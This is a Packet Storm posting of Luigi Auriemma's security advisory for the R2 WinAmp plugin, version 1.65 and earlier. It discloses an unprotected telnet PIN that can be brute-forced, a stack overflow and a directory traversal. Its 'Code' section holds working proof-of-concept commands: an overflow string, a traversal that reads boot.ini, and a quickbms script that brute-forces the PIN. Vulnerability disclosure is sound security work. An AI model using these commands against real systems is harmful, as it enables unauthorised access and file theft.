what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

R2 1.65 Stack Overflow / Directory Traversal / Brute Forcing

R2 1.65 Stack Overflow / Directory Traversal / Brute Forcing
Posted Feb 17, 2012
Authored by Luigi Auriemma | Site aluigi.org

R2 versions 1.65 and below suffer from stack overflow, PIN brute forcing, and directory traversal vulnerabilities.

tags | exploit, overflow, vulnerability
SHA-256 | ba8d5c2101fecdc6134ad9ee1e54309816085a9c6d2e7183056b526de4495867

R2 1.65 Stack Overflow / Directory Traversal / Brute Forcing

Change Mirror Download
#######################################################################

Luigi Auriemma

Application: R2
http://www.rabidhamster.org/R2/
Versions: <= 1.65
Platforms: Windows
Bugs: A] stack overflow
B] directory traversal
C] PIN brute forcing
Exploitation: remote
Date: 09 Feb 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's website:
"R2/Extreme is a plugin for the WinAmp music player. It produces
animated 3D graphics in real-time that twist and turn with the music.
Now used in nightclubs, parties, and even (apparently) a canadian
stripclub, R2 has become known for its fast, fluid visuals."


#######################################################################

=======
2) Bugs
=======


The registered version of R2 has a telnet port active by default and
uses a PIN number with a very limited range, from 1 to 9999.
The result is that it's enough to make a simple scanning of 9999 tries
to find the correct PIN and being able to exploit the following
vulnerabilites.

There are no IP bannings or other limitations, just check the "UNLOCKED"
reply to know what is the right PIN.


-----------------
A] stack overflow
-----------------

Stack overflow through the "File" command.


----------------------
B] directory traversal
----------------------

Directory traversal exploitable through the "File" command that allows
to view the files on the disk in which is installed the software.


--------------------
C] PIN brute forcing
--------------------

As explained in the introduction it's possible to brute force the PIN
number very easily being only 9999 those available.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip

1234 is the default PIN number, change it accordingly with the one
found through the brute forcing scanner.

A]
udpsz -T -b a -c "1234\r\nFile([" 0 -c "])\r\n" -1 -D -3 SERVER 23 4000

B]
udpsz -T -b a -c "1234\r\nFile([../../../../../../boot.ini])" -D -3 SERVER 23 -1

C]
http://aluigi.org/papers/quickbms.zip

### beginning of the script r2_1c.bms ###
for i = 1 <= 9999
print "scan PIN %i%"
put i line
do
get TEXT line
if TEXT == "UNLOCKED"
print "PIN found: %i%"
cleanexit
endif
while TEXT != "NOT UNLOCKED"
next i
### end of the script ###

quickbms -n r2_1c.bms tcp://SERVER:23


#######################################################################

======
4) Fix
======


No fix.


#######################################################################


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close